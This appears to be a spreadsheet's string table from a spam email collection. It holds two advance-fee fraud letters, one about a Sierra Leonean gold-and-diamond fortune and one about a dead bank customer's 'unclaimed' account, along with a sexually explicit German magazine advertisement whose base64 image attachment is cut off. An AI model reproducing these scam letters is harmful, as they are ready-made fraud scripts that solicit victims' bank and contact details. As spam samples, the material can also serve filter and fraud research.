  <si>
    <t>Attn/Dddddddd Rrrrr</t>
  </si>
  <si>
    <t>From: Mr Benard Gelicah Sankoh.\nbenardsankoh@rome.com\n\nDear,\n\nI am well confident of your capability to assist me in a transaction for mutual benefit of both parties, ie(me and you) I am also believing that you will not expose or betray the trust and confidence I am about to establish with you. I have decided to contact you with greatest delight and personal respect.\n\nI am Mr Benard Gelicah Sankoh Son to FODAY SANKOH who was arrested by the ECOMAOG PEACE KEEPING FORCE months ago in my country Sierra Leone. Few days before the arrest of my father, he confided in me and ordered me to go to his underground safe and move out immediately, with a Deposit Agreement and Cash Receipt he made with a security Company where he deposited One Iron Box containing USD$22 million dollars cash (TWENTY TWO MILLION DOLLARS).\nThis money was made from the sell of Gold and Diamond by my father and he have already decided to use this money for future investment of the family.\n\nThereafter, I contacted the security company and notify them with the two documents and confirmed the deposit of the box by my father.\nMeanwhile, my father have instructed me to look for a trusted foreigner who can assist me to move out this money immediately for investment .\n\nBased on this, I solicited for your assistance to transfer this fund into your Account, but I will\ndemand for the following requirement:\n\n(1) Could you provide for me a safe Bank Account where this fund will be transferred to in your country or another nearby country where\ntaxation will not take great toll on the money?\n\n(2) Could you be able to assist me to obtain my travelling papers after this transfer to enable me\ncome over to meet you in your country for the investment of this money?\n\n(3) Could you be able to introduce me to a profitable business venture that would not require much technical expertise in your country where part of this fund will be invested?\n\nPlease, all these requirements are urgently needed as it will enable me to establish a stronger business relationship with you hence I\nwill like you to be the general overseer of the investment thereafter. I am a Christian and I will please, want you to handle this transaction based on the trust I have established on you. For\nyour assistance in this transaction, I have decided to offer you 15% percent commission of the total amount at the end of this business.\nThe security of this business is very important to me and as such, I would like you to keep this business very confidential. Upon the\nreceipt of your mail\n\nI shall expect your urgent reply. \n\nThank you and God bless you\n\nMr Benard Gelicah Sankoh.\n-- \n__________________________________________________________\nSign-up for your own FREE Personalized E-mail at Mail.com\n[URL]http://www.mail.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.mail.com</t>
  </si>
  <si>
    <t>1965</t>
  </si>
  <si>
    <t>To: R@M\nFrom: frankholding_7 holding &lt;frankholding_7@yahoo.ca&gt;\nDate: Tue, 04 Apr 2006 19:47:14 -0700</t>
  </si>
  <si>
    <t>Tue, 04 Apr 2006 19:47:14 -0700</t>
  </si>
  <si>
    <t>frankholding_7 holding &lt;frankholding_7@yahoo.ca&gt;</t>
  </si>
  <si>
    <t>I have a new email address!You can now email me at: frankholding_7@yahoo.ca\n\nFROM MR JAMES  \n\nDIRECTOR OF FINANCE\n\nAUDITING AND ACCOUNTING UNIT,\n\nBANK OF AFRICA,\n\nCOTONOU-BENIN REPBLIC.\n\n\nTHIS IS MY PRIVATE  E-MAIL BOX:james221_2006@yahoo.com \n\nMy name is Mr.JAMES BROWN. I am the credit AUDITING AND ACCOUNTING \n\nUNIT,BANK OF AFRICA,COTONOU-BENIN REPBLIC. I am contacting you of a \n\nbusiness \n\ntransfer, of a huge sum of money from a deceased account. Though I know \n\nthat a transaction of this magnitude will make any one apprehensive and \n\nworried, but I am assuring you that everything has been taken care off, \n\nand all will be well at the end of the day. I decided to contact you \n\ndue to the urgency of this transaction. \n\nPROPOSITION; I am the account officer of a foreigner named Gerald Welsh \n\nwho died in an air crash along with his wife on the 31st October 1999 \n\nin an Egyptian airline 990 with other passengers on board. You can \n\nconfirm this from the website below which was published by BBC WORLD \n\nNEWS. \n\nWEBSITE. [URL]http://news.bbc.co.uk[/URL] Since his \n\ndeath, none of his next-of-kin are alive to make claims for this money \n\nas his heir, because they all died in the same accident himself and his \n\nwife(May their soul rest in peace). We cannot release the fund from his \n\naccount unless someone applies for claim as the next-of-kin to the \n\ndeceased as indicated in our banking guidelines. \n\nUpon this discovery, I now seek your permission to have you stand as a \n\nnext of kin to the deceased, as all documentations will be carefully \n\nworked out by me for the funds (USD 10,700,000.00) to be released in \n\nyour \n\nfavor as the beneficiary's next of kin. Because after four years the \n\nmoney will be called back to the bank treasury as unclaimed bills and \n\nthe \n\nmoney shared amongst the directors of the bank. so it is on this note i \n\ndecided to seek for whom his name shall be used as the next of \n\nkin/beneficiary to this funds rather than allow the bank directors to \n\nshare \n\nthis money amongst themselves at the end of the year. \n\nIt may interest you to know that we have secured from the probate an \n\norder of mandamus to locate any of the deceased beneficiaries. Please \n\nacknowledge receipt of this message in acceptance of our mutual \n\nbusiness \n\nendeavor by furnishing me with the following information if you are \n\ninterested. \n\n1.A Beneficiary name. In order for me to prepare the document for \n\ntransfer of the funds in your name. 2. Direct Telephone and fax \n\nnumbers. For \n\nour personal contact and mutual trust in each other. \n\nI shall be compensating you with [3million Million Dollars) \n\non final conclusion of this project for your assistance, while the \n\nbalance of 5 Million Dollars shall be for me for investment purposes. \n\nBecause I intend to retire after the conclusion of this transaction. \n\nIf this proposal is acceptable by you, please endeavor to contact me \n\nimmediately. Do not take undue advantage of the trust I have bestowed \n\nin \n\nyou, I await your urgent reply. to this address: james221_2006@yahoo.com \n\nRegards, \n\nJAMES   \n\n- frankholding_7 holding\n\n</t>
  </si>
  <si>
    <t>4326</t>
  </si>
  <si>
    <t>To: &lt;ler@lerctr.org&gt;\nFrom: K1-Sexkontaktmagazin &lt;news@k1-web.com&gt;\nDate: Tue, 03 Sep 2002 21:41:16 +0100</t>
  </si>
  <si>
    <t>Tue, 03 Sep 2002 21:41:16 +0100</t>
  </si>
  <si>
    <t>NEU IM HANDEL! K1-Ausgabe Nr.66</t>
  </si>
  <si>
    <t>This is a Multipart MIME message. Since your mail reader\ndoes not understand this format, some or all of\nthis message may not be legible.\n\n--XX4E5F4E43-0C5F4E5FXX\nContent-Type: text/plain;\n	charset=iso-8859-1\nContent-Transfer-Encoding: 7bit\n\nEs ist wieder soweit, die brandaktuelle\nK1-Ausgabe Nr.66, ist ab heute wieder im Handel erhltlich.\nMit hunderten Privatkontaktanzeigen und\nvielen erotischen Fotostories, avancierte K1\nzu einem der beliebtesten Erotikkontaktmagazinen,\nim deutschsprachigem Raum.\nHier ein kleiner Auszug, aus dem Inhalt, der neuen Ausgabe:\n\n"DIE NACHT DER GEILEN MSEN" - Bumsen bis zum Umfallen.\n"MUSIKUNTERRICHT Teil II" - Wenn die Schwanzflte spritzt.\n"DAS STEIFE SCHWERT" - Geblse in der Drehpause.\n"SIE IST JUNG, BLOND, GEIL" und steht auf Analsex.\n\nK1 IM INTERNET!\nSchon 24.000 Sexkontakte:\n[URL]http://www.k1-web.com[/URL]\nKostenloser Zugang!\n\nJETZT NEU!! \nSEX-SHOP MIT RIESIGER AUSWAHL\n[URL]http://www.k1-web.com[/URL]\n\nViel Spa mit\nK1-Sexkontaktmagazin.\n[URL]http://www.k1-web.com[/URL]\n\nSolltest Du an unserem Newsletter kein Interesse\nmehr haben, dann trage Dich bitte aus unter:\n[URL]http://www.k1-web.com[/URL]\n\nHier die neue Ausgabe Nr.66\n\n--XX4E5F4E43-0C5F4E5FXX\nContent-Type: image/jpeg\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment; filename="K1 Titelseite 66-Internet.jpg"\n\n/9j/4AAQSkZJRgABAgEASABIAAD/7RoiUGhvdG9zaG9wIDMuMAA4QklNA+kKUHJpbnQgSW5m\nbwAAAAB4AAMAAABIAEgAAAAAAw0CGv/i/+MDLAI2A0cFewPgAAIAAABIAEgAAAAAAw0CGgAB\nAAAAZAAAAAEAAwMDAP8AAScPAAEAAQAAAAAAAAAAAAAAAGAIABkBkAAAAAAAAAAAAAAAAAAA\nAAEAAAAAAAAAAAAAAAAAAAAAOEJJTQPtClJlc29sdXRpb24AAAAAEABIAAAAAQACAEgAAAAB\nAAI4QklNBA0YRlggR2xvYmFsIExpZ2h0aW5nIEFuZ2xlAAAAAAQAAAAeOEJJTQQZEkZYIEds\nb2JhbCBBbHRpdHVkZQAAAAAEAAAAHjhCSU0D8wtQcmludCBGbGFncwAAAAkAAAAAAAAAAAEA\nOEJJTQQKDkNvcHlyaWdodCBGbGFnAAAAAAEAADhCSU0nEBRKYXBhbmVzZSBQcmludCBGbGFn\ncwAAAAAKAAEAAAAAAAAAAjhCSU0D9RdDb2xvciBIYWxmdG9uZSBTZXR0aW5ncwAAAEgAL2Zm\nAAEAbGZmAAYAAAAAAAEAL2ZmAAEAoZmaAAYAAAAAAAEAMgAAAAEAWgAAAAYAAAAAAAEANQAA\nAAEALQAAAAYAAAAAAAE4QklNA/gXQ29sb3IgVHJhbnNmZXIgU2V0dGluZ3MAAABwAAD/////\n////////////////////////A+gAAAAA/////////////////////////////wPoAAAAAP//\n//////////////////////////8D6AAAAAD/////////////////////////////A+gAADhC\nSU0ECAZHdWlkZXMAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBB4NVVJMIG92ZXJyaWRlcwAA\nAAQAAAAAOEJJTQQaBlNsaWNlcwAAAACBAAAABgAAAAAAAAAAAAAB3QAAAVQAAAAQAEsAMQAg\nAFQAaQB0AGUAbABzAGUAaQB0AGUAIAA2ADYAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAA\nAAAAAAAAAVQAAAHdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhCSU0EFBdM\nYXllciBJRCBHZW5lcmF0b3IgQmFzZQAAAAQAAAABOEJJTQQMFU5ldyBXaW5kb3dzIFRodW1i\nbmFpbAAAFf0AAAABAAAAUAAAAHAAAADwAABpAAAAFeEAGAAB/9j/4AAQSkZJRgABAgEASABI\nAAD/7gAOQWRvYmUAZIAAAAAB/9sAhAAMCAgICQgMCQkMEQsKCxEVDwwMDxUYExMVExMYEQwM\nDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAQ0LCw0ODRAODhAUDg4OFBQODg4O\nFBEMDAwMDBERDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAz/wAARCABwAFAD\nASIAAhEBAxEB/90ABAAF/8QBPwAAAQUBAQEBAQEAAAAAAAAAAwABAgQFBgcICQoLAQABBQEB\nAQEBAQAAAAAAAAABAAIDBAUGBwgJCgsQAAEEAQMCBAIFBwYIBQMMMwEAAhEDBCESMQVBUWET\nInGBMgYUkaGxQiMkFVLBYjM0coLRQwclklPw4fFjczUWorKDJkSTVGRFwqN0NhfSVeJl8rOE\nw9N14/NGJ5SkhbSVxNTk9KW1xdXl9VZmdoaWprbG1ub2N0dXZ3eHl6e3x9fn9xEAAgIBAgQE\nAwQFBgcHBgU1AQACEQMhMRIEQVFhcSITBTKBkRShsUIjwVLR8DMkYuFygpJDUxVjczTxJQYW\norKDByY1wtJEk1SjF2RFVTZ0ZeLys4TD03Xj80aUpIW0lcTU5PSltcXV5fVWZnaGlqa2xtbm\n9ic3R1dnd4eXp7fH/9oADAMBAAIRAxEAPwDicN7j0gbnE/orRqTwA8BDy+l9MrNj6RZscHCi\ns3Pe4EOroabXfsyhj/Ussfayv9Xs9Kr0vZd9n+0X/q9b6WCHenXaTU9oFzG2AbrNr3NrtDq9\n+z9H72fQf/bXRCro9WNQ3I6eLcy+h1zhTRhxzb6LG0PxDY91lddT9nrfpfV9ipTzCEiNdZH5\nXd5jlJ5+X5fJY4YYo7y1/mozlP5J+mPC8B+yneoGi9haXFpsDLiGtDtjL3D0PU9G36Veyvf+\n/XvVpnTcEBlbm232tO259byxpcQHBlddmI/IY6ne1t3qV/TZZ6S7cs+r1LHMuxa8h1LQ2/Io\now2VOvIe4YuKx2Hc6/3s9Nj/AFf0np35v6DFp9VEso+ruLcMPK6e52XWRXb6eNhMYXj22Po3\n4jrHVOfv9Hf+YhLm43R4r8B9vyf3mr/oyYJAo0OKWsvk/wALF6GX1Cw7Mj6s4uzg3XtJPAks\n2z/6T/nV32FRTi0CtpHq6mx886+3e/6X9hv+EXIfUDNvtsyabK62immqyquqtlbKnWOezJ9I\nVMbXX6rW+7bT6ty2XdZacy7HNJccZoc4V2Bw3WT6DHe31PXs27n/AE6Kcb9K+7/AW28/PyOO\nGOPpAGrQh8I9rmc3FU5iX6O36zhybT4Zfp8LqW9Tpx67si69ldOMA65xLnFkxtZ6dX+Gfuay\nundvs/0S806ni2V3WZWP0avAwnl1hxnV03upkl7nWTj/AKCl307cbfb+zn7/APtL+jxuk6sz\nreU7FrqNbqK3B19UOpfS/Vrs+jNYWN9Vm97qn+l/1vJT5HUsQ5j2Y1732Y72Mvy9uyttxAJ3\nvr3V4/0v8J+i9RUvckQADd/N4Olgxxxz4jEEi6jMcWOX0/rf+w3l8jHZQDYzHx8ii3aMe70M\netm47HuGSRVb6dlVZd62Pv8A+E/o/vsrdSZj1dPvHo0Nv9Oxssx6Cx3s3PfVeyv2W4/qMpt9\nD2fzN+PauozuhX9LxmdZw6Bf0y5of1DpjS4MY33bLm11/wDabY/1v/NVd+mq/UP6HzvVTmU9\nHuqreL8B1Tqm5Qa6S1gc+vDLrHObjbHM9V2Ls9b2Y/6ezBrxkiMnFAgmiQT6pfL/AM7/ABf/\nAEds1DL6scYVE1kFY4G48UeH5OD97/zo/nuX9ueL2+X/AP/QxvqHRiuxn35jA/Hrq9Lc9r3t\nbZfe3HY8MqZd6l/puu+y1en/AEj0/wDja9bLrczqv2ysOw6XU0sxnMO8VvdXj4PpC2wb3fYr\n8hvr27PtHps9ev8ASemsv6kZzqMHDracZjftFj7XZLiBENqqcPSY/Iqur3W/ZMnH/mrPU3q9\n12j6w32W4GPXVdfXkh2yBj1AXixzcar7XZjX7GP99GL+fbZdf+n9P11Rz4b45SlGA19c/wDN\nk+u+L9X/ACxu9jnkhGErPDLBjhqJZIjFwQ4yIfv/ANX+u5lpL8fHc0+2ndU+sR7XuJu9b979\nbra2r+R+z6/Us/T49at5Pp41lNVDRWcLA30Boj9M6p+fX7R/3cylI9E+ueWLG3txmeqQbXne\n8FzH+pFtuHXd/N5GPus3P/nWIGZj9abXazK6v0n2saX+pkPFr/SLXsq/SMZk2+6ir6Xss/Rq\npx45ER9yB+bSEuP+c/S9Mfm9WVMuejwTiQI8fu0Ze7eP7x80o8eGHucE5Zf3P3Ha+pWU3Fs6\ntbG9zcenZX+8RZbtn+R++tro7q7X5Ev3Pdkv9xEmxrG1U+u3jf8ApG27mrl/q/YMTpLs29+7\nMz3uxvszGkBv2ax25rXbrPV9axzPWvfsqx6f0f8AO3LbodXi9Px6C/8AWfTFvMHdZuudbu/N\n9znKbLKiNjWn/fKlw5smXLC6zSBj/dEIx1DHO65ZVnvxX0bRe4txr95sofcG7Km3t9Op+zdY\n3fX/AIH2fzixD0qnLvuynvdTkU+pk5ORWdB65/S07fd6j7rbNuPW3+3+jrW5k9O6qSHX+nQ6\n1u81l8vMCDYa3+la/b+/sV7o31ef6VtbNx9WypxttIjbXue9lLfo+93p7n+mpMZNVEUZD1f1\nmLNLEACK9NAG+LY/P/L9x6fEeWdIbc1hZY2iTWTuLXsZsdXP8l1a8r+sXRBRh5OXgMnHNVhs\nx2jWoFhPqUN/Ow/3q/8AtF/4T/o3rN8Mx7aazBZS4t8ZA+lr/KXNU4F7SHkfQ1/lCFq4MGOe\nIxyUJCjGXXicDJzvMcvzMcvLk0RKOSH+Tnjl+hMP/9Gn9Uhi1/4v8rMdVVfbhZRybKbhuY9l\nTf0db/8AtzI21/4f34/+FWx17C6jjdVrurybr/tbHtbi1OzXGwUv/S9QyLukU12tt/S42BVQ\n+rJoo9erZb9npppXL/VfLw6fqpnYmWMj0uoAUuspra5rCw22tO+x7d1z2+p+h/cZ/OKxl9f6\nPd0vpvT7n5DndPbZXVkXYVF7n0u2bWuxsl2yl1foVU+vVb6j66v+Gf6dP0zlOMoynASIlUcn\nX1b427zPEIYo2dYRnG6/zWNDX9WQ9wZk4uRl3sLX2224vUYDrn1MfhenUxln6hS5+b9o+nl/\naa6vSVDK6L0gVY1+Rd+yasoBzHHDzH12VubiPsvxbckl1teP9quZ/L+y+r6n65ioj+sdAIcG\n3iHSD/kfp4/k6Ob7q/7DU2ZX0S1m7Kfl0saHODqum42MNthLd73UOr9RjrfbVv8A5r+bpUvu\nQjR4clnYcOf/AKEvQ1APIf4ru/Vnptt9NmVYWtLsjIa5r3EuYBYf0VX5uze529dNUynBtuz5\na/KsLGUyZZWypuyraxv85e925+xrll/Veymzowvqc51VmVlOq3gB5a60lm8N9jbNv01ayqnP\nLpybay6J9zyTHH0Xtc5UJE8R01/J28XqxQBNR4QNP0g17chzbLN1bMrLadzjH6NlpP07bJ35\nHo+p6NFNX+E/mrK/8F0GDm9fNFQe6iozO2tm9zo022Hcypjf9J6NbP8Ag/TWThU47Hte9/qb\nXOeAAGN3OPueWAu3v/d3OWm7qDa2fox9LhKMyDoTHyW5YCVAREz3lt/iut678ylz6mj1GgDJ\nqGr5H0dn+kYgh4IB5B4I4grKoy8jHvbl06vH0mn89n5zHf8AfVrWXYb/AEbsdwDMsOcyp2jg\nWH9LH/pNa3J8yJx4JfMP+c43PcnLHLjgCYG7A14K9Uv8F//S5PpLcRv1fGRYf1iuwtawObJq\nLch9z2V/znsfXWz1P5v9Ir/Tup4n2YF/RunOdYXBrhkYzHgNnd61fWP2nlNc307Nrnejv/4T\n9CqfTNfqfcwTrcCTAgfo8xrBu379zt1n+B9P9H/O/mLQws25+JU3IvLdrGMfSOndPvYWY81Y\n9br8nMrtyWU1fQ9ev1f5fsYqXDCfuxnKgMhoSlOMfl7QnhdTmNIcvLf9XEajj/yeP9GUZt2z\n61daDm4mNTh1QDtaM2mYBYHS/pt/TKPa/wDm2/zv8/8AmeuquZ9YPrTVW/IZfi0OY15L6rse\n60iPf6fr5mdkP/m/8D/o/wCumZV6lOPU5t1hZTWwA9L6fazdU1mz9fuyK7bcdvpV178pvrW4\n/wDO/wA4gOy6KDfXh3V3WvJDaz0zpjg+G1uqotsqyrmbG20V/wAxV/pMn+dUcOT5YEVHBX6Q\nMePz+fLNrceQirkP6sTKMP8AEj6Xpvq4xtfSnN9TY12ZmbY9rWBtm1tTdn822yPpM/62j01u\nbLnuJZABLS4sc/8AOdT6hc/02/vLO6M+/CxGU1ufbXdkZe7YPtD2ltj276aWOFmdt9r7PRs/\n0lv82rROdkVz6r872g/aum3UZNZiPU9TEy6qsqp/u/msd71HRsnSr6ujCo4oAneMToyFbnZt\nNNToOWLKqn6ENvLHWYzrG/4St3p2/wDXPTWM/qnUrGS5zRQJcC0brW/2C5jLdn0Ppb1sjC+z\nZONdlZNlv2d7cj0DSyt29mtDbLWW2/Rc7fZVUz+R6lS5XrtOUM++81Pbi5JF7HtYfTG/W1m5\ng2Nc23erAjGXaiBV9/0lsJESo3/F6/o/VcfNxG2ixuyC5zzo1kD3+pu+h6axr+tB2fdkVzXV\n/NVPJMsA/R+qGN+nftts/qZV36L+bWFjj02Ot3QbGiGTyP8ABe2f3voKTng7S3+brMNPMuGm\n/wDlO/cZ/pf+KUmDDHHIyJu/lB/Ri6eLAIx4pgGUh8o/d/ff/9Pl+lbD9VHsc4e64ewRvI2Z\ne7831Nrf+N+n/gverGGPqxVSWXdOuyLa+zbXuBH7z3faOnena6z/AAbMbZ/X/wAFDocn6rbX\nGazls0kQP0eXvLmz7d7dnv2/4NNfj31M3FlnptADntB3e127dujb+8qUIe4c0blH9bvjnLF+\njH9x2pYxLFhkSeGMIXwxjM+rFDX1tunrnSnNrZi9BwmlrvoWllvtO723OtxXXu2t9vsejftC\n0Vu3YHT7C1m0E0NLQG/Ra6utmOy3Y73MrezZ63/F1rGxsyqnKpvyWW2113M9RkAF9QcC6l1k\nD6f0Hfueot84XTCxzd+cCzcHOsx2v3AukAMx7P0XpV7vfv8A09n+CpSy8rijIH2+G/38mWZs\nbniyyYMUcJBEZyydzHDj+WXF6f1c/mdbpuFU/CODqypl9z6S0kPrcy13p2U2fSZZX+Y9B6gL\nmZjbszFozy/aBkbWsyNw+i6w7sX1fU/P/Wf+tK/0+BQ5zva4XXkgHxedzZVXqVVeTW5nqPBd\n+c3kH80+9U4y1snff+LcxD0R02iP5CTlZXVmOusutdZQ2drRkb2ubt9u3e8H03N/cc9aHT+u\nY/otfRl1Tqwj1ACT321s2/8ATVJ4z36OfU6yNr3t3MLo/er/AO+rJv6Dlh5sY2t8/mAkGT+d\n7/arMYwlGjLhrb9JUgRIaCQPzdOF6m23GvcXZGPj3uJmXVtcZ/rRvQDj9Gc0B2FSABDC1oBZ\np/gnD6G381YnScDqORnMxKA9rgYdvnaxv59tu4O2saz+T+56a7J31Vw3MNlOVkmsE+9rq7Wj\n+v8AomW1/wDX0+PKZJfKR4a8JW8znxcrw+5KrHFcOKYgP0ZT4Pk4v8n/AHH/1OW6RbV/zZOP\nM32XixjBunY1mUx7twmtvvtrb/pVoel0p17n35gf6R/R3YfT2VtYQGe2+v0xVdi+rvrs/Vsi\ny3GxvT9b08i2h9f6ubndApqc14qsza5t0FbSG5ALTYXfzrmu3fzfsZ+eunyOm/Vr1BdiswWZ\nENaCXZstJG0epteync3Y7+cr/S7P5tVMYHFlJjkkOOeuIY8lemG/HD0cX6EP9o6XNCMocuBM\nQnwQ/nP5sx9vG89m9IwQ219DxL2RLcJslroquZTWLX0stZi1Mdh3/wA5dddZ+sUX+rkpm9O6\nNlix7MqWl1r2lmFoPUDNzKGufS37NXsf9lotZ+rer6zK/Xs/QbVDukvBqxndMsB3PqoA6gJA\n3720tc5u73U2v2N3+/fsUqm/VGj9LYcKz1Q6xraRnfpJAO4y8sb+570MsZxGnu3Hb04vl/d+\nT+r8i6ODAdvVKhxwjc+Ht+j/AFv04+t0cfHFtdjHlzD61vuY4tcPdO7e1WmYtNVQa0l57ue4\nucfEucf5SzsLKtDnssY5rvUdu3a6zr9EK9ZlU0N9S1wrb/KOvyb9JyoDYBu1IAa9A076W7tG\niexUa6mj6RLh9ykeoYORkOpos9S1n09oMCRu+kfajtpBZuOjD3HJ8k8kgUUur01nRcmoGsV4\nOdsNbcisCInePWrP6K1vqe73/wBjYqeP1hxtf9qxrKrqXbBdSQQ4tH+Bs3Mt9NzvoP320f6T\n9xUmYFTtPTaB4ET/ANFXqMJrQNAGjjwVmHPZIQEIiJH9YcTTychglM5JGQn+jKEpQnD96IMZ\nfp/14v8A/9XnfqtTTldOxcFwLX5OZVWbgWHax5yKoDDF2737/b+i/wBJ6fs9Tq8/E6f03Pfh\nupvzR6zqjZbkelMVNyp9PEx62fnemuU+qFlO3ptIDhkuzanMcAwjaHva4bo+0b95Z7WP9F/+\nE99da7rMwKesdQty8bLAaLXZHpih73lrqm49ja699Vlr6dvrbKmfp2fzKr4ZATyxJ4eKVizR\nl+j6XR53HI4+XlGJlWKNnh44x/V49/3Wh0PD6R1nPGJ+z3Yb6azbVdTl3FwNT6Wshrmta126\n71vV/wBIqdo6fXndQwycal2Fl2Vhtgxqt9Qrda2PtGP/AD11teyy+q62uqz/ALRU12ULX6A3\npXROqDLt6rVa91TmfZ7KX4rosdW91u/Ls/m6W0/urJyM2sZ/UcrprLTdk322MuZdj+jaf1lu\nHe+u/wDS7K231/ov8L/hVZx5McRIkQynQRhlnCOPiv5pTy+5w/4EMk2kceexUZwP70IyjOu3\np9XCws6i6rqePjU2syK3tfdkuqfTbuMPhjLcamttfvY6/Z6tn+Cq/wCGyD9YxaMqhuSA270g\nWudwQ1wP0mS3Z7v5xCdSy3qTMwUXV7A6vfdbjOaKfTvrpprxsMfo9rn4/wC+ne17LGuEur4e\n0T9F3ts0/qqnzZhOcJ4oxx1jHFHGYShx8U+L1YfS6PISnGBGXiPrP85xcXBwx/fcLAyjQGWl\nuxhJDpzzzzd0rvGWVupaGg7WtEAgaggQ/RcJn0ZODY8W1mzHLS19rQHNewD9Fc1v5t9Oxvq/8A\nBLs+it2YFNT3ixzGw5/iPzX/AMpu1V81GpD9Ls26AFanhb1bREuGpT2XQCZCzsvqZqcWzx+V\nZN3Usm4batxJ8EyOOUtgsNbyL//ZADhCSU0EIRpWZXJzaW9uIGNvbXBhdGliaWxpdHkgaW5m\nbwAAAABVAAAAAQEAAAAPAEEAZABvAGIAZQAgAFAAaABvAHQAbwBzAGgAbwBwAAAAEwBBAGQA\nbwBiAGUAIABQAGgAbwB0AG8AcwBoAG8AcAAgADYALgAwAAAAAQA4QklNBAYMSlBFRyBRdWFs\naXR5AAAAAAcAAAAAAAEBAP/iAqhJQ0NfUFJPRklMRQABAQAAAphhcHBsAiAAAG1udHJSR0Ig\nWFlaIAfQAAgADQADAAMAC2Fjc3BBUFBMAAAAAGFwcGwAAAQBAAAAAAAAAAIAAAABAAD21gAB\nAAAAANMtYXBwbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAC2Rlc2MAAAEIAAAAn3JYWVoAAAGoAAAAFGdYWVoAAAG8AAAAFGJYWVoAAAHQAAAAFHJU\nUkMAAAHkAAAADmdUUkMAAAHkAAAADmJUUkMAAAHkAAAADnd0cHQAAAH0AAAAFGNwcnQAAAII\nAAAAM3ZjZ3QAAAI8AAAAMGNoYWQAAAJsAAAALGRlc2MAAAAAAAAAF0FsbGdlbWVpbmVzIFJH\nQiBQcm9maWwAAAAAAAAAABcAQQBsAGwAZwBlAG0AZQBpAG4AZQBzACAAUgBHAEIAIABQAHIA\nbwBmAGkAbAAAAAAXQWxsZ2VtZWluZXMgUkdCIFByb2ZpbAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAbScAADngAAAC9VhZWiAAAAAA\nAABemgAAr70AABhZWFlaIAAAAAAAACsPAAAWWAAAt9pjdXJ2AAAAAAAAAAEBzAAAWFlaIAAA\nAAAAAPMbAAEAAAABZ+d0ZXh0AAAAAENvcHlyaWdodCBBcHBsZSBDb21wdXRlciwgSW5jLiAx\nOTk4IC0gMjAwMAAAdmNndAAAAAAAAAABAAC4UgAAAAAAAQAAAAC4UgAAAAAAAQAAAAC4UgAA\nAAAAAQAAc2YzMgAAAAAAARmfAAALPv//6VsAAA69AAD88P//+Dr///vvAAAGjwAAlEv/7gAO\nQWRvYmUAZIAAAAAB/9sAhAAQCwsLDAsQDAwQFw8NDxcbFBAQFBsfFxcXFxcfEQwMDAwMDBEM\nDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAREPDxETERUSEhUUDg4OFBQODg4OFBEMDAwM\nDBERDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAz/wAARCAHdAVQDASIAAhEB\nAxEB/90ABAAW/8QBPwAAAQUBAQEBAQEAAAAAAAAAAwABAgQFBgcICQoLAQABBQEBAQEBAQAA\nAAAAAAABAAIDBAUGBwgJCgsQAAEEAQMCBAIFBwYIBQMMMwEAAhEDBCESMQVBUWETInGBMgYU\nkaGxQiMkFVLBYjM0coLRQwclklPw4fFjczUWorKDJkSTVGRFwqN0NhfSVeJl8rOEw9N14/NG\nJ5SkhbSVxNTk9KW1xdXl9VZmdoaWprbG1ub2N0dXZ3eHl6e3x9fn9xEAAgIBAgQEAwQFBgcH\nBgU1AQACEQMhMRIEQVFhcSITBTKBkRShsUIjwVLR8DMkYuFygpJDUxVjczTxJQYWorKDByY1\nwtJEk1SjF2RFVTZ0ZeLys4TD03Xj80aUpIW0lcTU5PSltcXV5fVWZnaGlqa2xtbm9ic3R1dn\nd4eXp7fH/9oADAMBAAIRAxEAPwDhsS51L3Pb4cLXbaS0GOQCsWr874LWr+g34D8iiyAOz8Ly\nTEJRv0jWv8JL6h8FT6t/N1/E/kVlVuq/zdfxP5E2HzBs89InlM1/1P8A0rBzEl1g+puIRP7R\nxR5HIAP9r9XWTn9GrxMuzHZcL210+qLKXC1pcTsZXvin87+QpeMOHk5fJCPFKq23clJaI6XW\nRX+mAfZZRXsMAj1mufa97d25jaUruj2Vtc/1qtu11jQXe4saA/3Na322O3s9iHuQurYXOSSS\nT1KSSSSUpJJFxqXZF7KWCXPMAf8AnIeltqoAk0OqJJa3/N/N/wBGf+n/AO86AzprSQx9oZYc\nluOa+7R7vVufu2P9n/FpgywO0hKv3fUvniyQozhKF/vBoJK/Z0ixjHWetTDWG3bv9232lrfo\n/wA471GKgnCQOxtY9/0T/knF/wCLCvqj0QH9kYh/kQr4GoC1YfJH+6HGyD1y/vFXx7IlLjPw\n4Hko7DBgTqj0UR+kscGgCAEJEUmETxaJcWlxY/uZAB8lqUY9dTJiPEoeGxvpS0SCVZcC7TsF\nUy5LJF13b+LGBEHc1ooPEe0JwT+d9ybQcfeoTrp96qzygaRbUMZOsmZskgAcpeoSgl2p7nxS\nD2tEuKi4+5ZuDsE4eVR6x0jE6zifZMxntncywEB9bv36nKyL2RoCpte52sbR+KQn4oMfB83z\nfq50Lp2UcPqL8vHedarQWPqtb+/U9tLXM/l1qH7D+q3/AHLyfuH/AKRXbfWGrp2fiHEzCCTr\nW4H3sf8A6Sty89e2zDvOLe4PH+CuaZa8JGRPyyOnRucrjwTPDmjwcXyTjpD+7Libn7D+q/8A\n3Myf80f+kUv2H9V/+5mT/mj/ANIqukm8Uv3i6X+i+W7S+2P/AHrY/YX1X/7mZH+aP/SCX7C+\nq/8A3MyP80f+kUHY8sL9p2AwXRpP7u5RS4pfvFH+i+W7S+2P/etj9hfVf/ubkf5o/wDSCX7C\n+q//AHNyP80f+kUXpmHXlPtdaT6NDDZaGhxdtH+i2Nfut/cqUXsxLHNbj12Cu2Rj5Be14scP\n8HfQ2up+JZ+Z9Oz0/wDwRRHmKmYXL0/Mf0YtefLchDJ7cuPiG9erh/5qP9g/Vn/ubkf5o/8A\nSKX7B+rH/c7I/wA3/wBQoDXBwDhwdQtPHbgsxS6W2VafbMsgkM19vT+ntd/PdRu/8BRyZpQA\nJMpWa9K7PynJYYCUuOXH8giY+pp/sH6s/wDc6/8AzP